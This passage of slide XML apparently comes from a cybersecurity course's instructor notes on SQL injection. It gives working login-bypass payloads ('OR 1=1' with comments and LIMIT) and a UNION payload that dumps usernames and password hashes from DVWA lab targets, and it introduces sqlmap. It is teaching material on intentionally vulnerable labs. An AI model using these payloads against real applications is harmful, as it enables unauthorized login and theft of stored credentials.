            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - **Username**: `admin' OR '1'='1'; -- `</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>    - **Note**: You _must_ include an extra space after the `--`!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - **Password**: Leave this blank, to prove that it doesn't matter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Submit the form, and demonstrate that this logs you in successfully.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that, since the injected query _did_ generate a result, the server logged you in—_though the password was wrong_!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Emphasize the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Injecting OR allows attackers to retrieve results from the database to bypass password check logic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Attackers can inject comments to prevent the database from executing the application's original query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Take a moment to address remaining questions before proceeding.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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2557104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Stu_Login_Bypasses</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4032049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i="0" dirty="0"/>
              <a:t>Activities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Stu_Login_Bypasses/Solved/README.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> (duplicated below).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>### Classic Login Bypasses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Navigate to: &lt;http://ptl-b1464393-cabeb391.libcurl.so/login.php&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Try to log in as `admin` with an arbitrary password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Try to log in as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - `admin'`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - `admin"`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Based on the error output, which type of quote do you think the SQL statement uses?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>    &gt; **Solution**: The error output suggests that the server is using a single quote</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Add an `or` statement to your injection. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - If the server uses double quotes, your query should now look like: `admin" or &lt;Condition&gt;`, where `&lt;Condition&gt;` is your always-true condition, such as `'2'='2'`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>    &gt; **Solution**: Try `admin' or '1'='1`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- If your injection works—congratulations! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>---</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Suppose the SQL statement on the server looks like the below, where the username you submit to the form gets substituted in `$USERNAME`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  SELECT * FROM users WHERE username='$USERNAME' and password='$PASSWORD'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- What does the statement look like if you substitute your payload for `$USERNAME`?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>    &gt; **Solution**: It looks like: `SELECT * FROM users WHERE username='admin' or '1'='1'' and password='$PASSWORD'`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - You might notice an extra quote. How could you modify your payload to remove it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>    &gt; **Solution**: Update the payload to `admin' or '1'='1'`!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  SELECT * FROM users WHERE username=admin' or '1'='1' and password='$PASSWORD'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>## Extension</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Recall that the OR clause results in the database retrieving _all_ rows. Of course, you'd expect a valid username/password combination to return just one. A well-designed web application would refuse to log in users whose username/password submission returns more than 1 result, since this would suggest an injection attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>(Un)fortunately, this protection can be bypassed by injecting a LIMIT statement. Read about it at: &lt;https://www.techonthenet.com/sql/select_limit.php&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Then, load the vulnerable form at: &lt;http://ptl-726b6879-cc829763.libcurl.so/login.php&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Update your injection payload to include a LIMIT statement to bypass this form.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt; **Solution**: `' OR '1'='1' LIMIT 1;-- `</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Demonstrate the solution to the extension by navigating to: &lt;http://ptl-726b6879-cc829763.libcurl.so/login.php&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>…And entering: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>admin’ OR ‘1’=‘1’ LIMIT 1;-- </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>: Be sure to include a space after the --!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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3334851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While login bypasses are both a real threat and accessible introduction to SQL injection, dumping databases is the real “gold mine” for attackers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>There are many types of injections that can be used to dump databases, including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>In-Band/UNION-based SQL injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>Error-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>Blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Such </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> payloads can get quite complex, so we’ll restrict our attention to a high-level overview of In-Band </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>, which students will manually in the homework.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Then, we’ll use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> to automatically dump data from a site vulnerable to an in-band injection.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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2488079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Remind students that SELECT statements allow you to extract data from a single table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Point out that relying on SELECT limits your ability to exfiltrate data from a vulnerable application, as you can only retrieve data from whichever table the application gives you access to.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Point out that injecting OR is also limited because it only allows you to retrieve the columns specified by the developer in the original query. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - E.g., in: `SELECT first, last FROM users WHERE id='' OR '1'='1'`, you'll retrieve all rows, but only the `first` and `last` columns—not `password`, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Explain that there is a SQL statement that allow you to retrieve data from multiple tables, or select arbitrary columns: UNION.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Explain that UNION allows you to run _two_ SELECT queries, possibly from separate tables, and dump data from both.</a:t>
            </a:r>
          </a:p>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2471157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Explain that some sites allow you to inject a UNION keyword—which means you can SELECT almost anything you want from the database!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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358112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291324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organization’s SQL databases are amongst its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>most valuable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> assets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In many cases, such databases store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> digital about the company, including its financial records; employee payroll information; trade secrets; confidential correspondences; etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>Even though this data is typically distributed across multiple databases, the compromise of even a sliver of an organization’s confidential data can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1"/>
              <a:t>disastrious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>Heartland Payment systems is just such a case—a partial, albeit enormous, compromise of their customer information was directly responsible for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>9 figure losses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> (!)</a:t>
            </a:r>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084268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Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>: Make sure you have DVWA up and running. Open a Terminal (on Mac) or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>Docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0" err="1"/>
              <a:t>Quickstart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t> Terminal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> (on Windows) and run:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>docker run --rm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0" err="1"/>
              <a:t>vulnerables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>/web-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Navigate to the appropriate DVWA URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - **Mac**: `http://localhost/vulnerabilties/sqli`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - **Windows**: `http://192.168.99.100/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>vulnerabilties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- For **User ID**, submit: `1' UNION SELECT user, password FROM users; -- `</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - **Note**: Make sure you include a single space after the `--`!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that this retrieved each user's username, _and_ their password hash. In other words, UNION allowed you to extract data that the original query did _not_ expose!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Point out that the application still reported these values as `First name` and `Surname`, even though they came from different table. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - This is because you "tricked" it into retrieving data it wasn't meant to, so the labels in the view don't match up to the data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that this is called an **In-Band SQL Injection**, or a **UNION-based SQL Injection**.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that UNION-based SQL injections are particularly dangerous, because they can be exploited to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>dump the entire database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that you'll next show students how to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> to dump data from an application vulnerable to a UNION-based SQL injection.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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032251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Explain that crafting UNION injections by hand can get quite complicated, because it requires:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Determining how many columns the left query uses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Matching the data types of your injected right query with those of the left query (on non-MySQL backends)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Using advanced SQL features to dump data, such as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> keyword and clever use of built-in functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Rather than craft UNION-based injections by hand, most attackers and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>pentesters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> will:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Manually identify a potential UNION-based injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Use an automated tool, like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>, to exploit it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that one of the most popular tools for automated SQL injection is [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>](http://sqlmap.org/).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> can be used to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Test a URL, like `http://dvwa.com/?id=1`, for injection vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Enumerate the tables in a vulnerable database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
